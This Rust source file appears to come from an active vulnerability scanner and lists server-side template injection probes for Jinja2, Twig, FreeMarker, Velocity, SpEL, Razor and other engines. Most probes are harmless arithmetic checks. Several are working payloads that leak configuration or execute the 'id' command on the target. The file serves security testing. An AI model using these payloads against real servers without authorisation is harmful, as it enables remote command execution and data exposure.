use crate::domain::active_vuln::{ExpectedIndicator, PayloadDefinition};
use crate::domain::entities::SeverityLevel;

pub fn get_payloads() -> Vec<PayloadDefinition> {
    vec![
        PayloadDefinition {
            id: "ssti_01".into(),
            payload: "${7*7}".to_string(),
            description: "SSTI: Freemarker / Velocity simple evaluation".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_02".into(),
            payload: "{{7*7}}".to_string(),
            description: "SSTI: Jinja2 / Twig simple evaluation".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_03".into(),
            payload: "<% 7*7 %>".to_string(),
            description: "SSTI: ERB / Underscore simple evaluation".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_04".into(),
            payload: "{{config.items()}}".to_string(),
            description: "SSTI: Jinja2 config leak".to_string(),
            expected_indicator: ExpectedIndicator::ErrorPattern("dict_items".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssti_05".into(),
            payload: "${7*7}".to_string(),
            description: "SSTI: Spring Expression Language (SpEL) / Java".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_06".into(),
            payload: "#{7*7}".to_string(),
            description: "SSTI: JSF / Expression Language (EL)".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_07".into(),
            payload: "*{{7*7}}".to_string(),
            description: "SSTI: Tornado (Python) / VueJS".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_08".into(),
            payload: "@(7*7)".to_string(),
            description: "SSTI: Razor (C#)".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("49".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssti_09".into(),
            payload: "{{ ''.__class__.__mro__[1].__subclasses__() }}".to_string(),
            description: "SSTI: Jinja2 classes leak".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("type".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssti_10".into(),
            payload: "{{['id']|filter('system')}}".to_string(),
            description: "SSTI: Twig command execution check".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("uid=".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssti_11".into(),
            payload: "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }".to_string(),
            description: "SSTI: FreeMarker command execution check".to_string(),
            expected_indicator: ExpectedIndicator::ReflectedContent("uid=".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssti_12".into(),
            payload: "#set($engine=\"\")\n#set($run=$engine.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"id\"))".to_string(),
            description: "SSTI: Velocity command execution check".to_string(),
            expected_indicator: ExpectedIndicator::ErrorPattern("Process".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssti_13".into(),
            payload: "T(java.lang.Runtime).getRuntime().exec('id')".to_string(),
            description: "SSTI: SpEL command execution check".to_string(),
            expected_indicator: ExpectedIndicator::ErrorPattern("Process".to_string()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        }
    ]
}
